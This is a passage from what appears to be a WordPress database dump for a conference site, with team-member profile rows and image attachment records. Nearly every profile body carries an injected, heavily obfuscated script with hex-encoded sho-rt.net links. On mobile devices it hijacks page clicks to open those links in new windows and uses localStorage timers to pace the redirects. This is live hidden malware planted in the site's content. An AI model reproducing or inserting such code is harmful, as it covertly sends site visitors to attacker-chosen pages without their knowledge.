Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Erica Nocerino','','publish','closed','closed','','erica-nocerino','','','2022-11-23 06:06:26','2022-11-23 06:06:26','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3337',0,'dt_team','',0),
(3338,1,'2022-11-23 06:06:09','2022-11-23 06:06:09','','w221','','inherit','open','closed','','w221','','','2022-11-23 06:06:09','2022-11-23 06:06:09','',3337,'https://gsw2023.com/wp-content/uploads/2022/11/w221.jpg',0,'attachment','image/jpeg',0),
(3339,1,'2022-11-23 06:07:47','2022-11-23 06:07:47','<!-- wp:paragraph -->\n<p>FBK - Bruno Kessler Foundation (WGII/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Fabio Menna','','publish','closed','closed','','fabio-menna','','','2022-11-23 06:07:51','2022-11-23 06:07:51','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3339',0,'dt_team','',0),
(3340,1,'2022-11-23 06:07:43','2022-11-23 06:07:43','','w222','','inherit','open','closed','','w222','','','2022-11-23 06:07:43','2022-11-23 06:07:43','',3339,'https://gsw2023.com/wp-content/uploads/2022/11/w222.jpg',0,'attachment','image/jpeg',0),
(3341,1,'2022-11-23 06:09:05','2022-11-23 06:09:05','<!-- wp:paragraph -->\n<p>Cyprus University of Technology (WGII/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dimitrios Skarlatos','','publish','closed','closed','','dimitrios-skarlatos','','','2022-11-23 06:09:08','2022-11-23 06:09:08','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3341',0,'dt_team','',0),
(3342,1,'2022-11-23 06:08:38','2022-11-23 06:08:38','','w223','','inherit','open','closed','','w223','','','2022-11-23 06:08:38','2022-11-23 06:08:38','',3341,'https://gsw2023.com/wp-content/uploads/2022/11/w223.jpg',0,'attachment','image/jpeg',0),
(3343,1,'2022-11-23 06:10:34','2022-11-23 06:10:34','<!-- wp:paragraph -->\n<p>University Iuav of Venice (WGII/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return 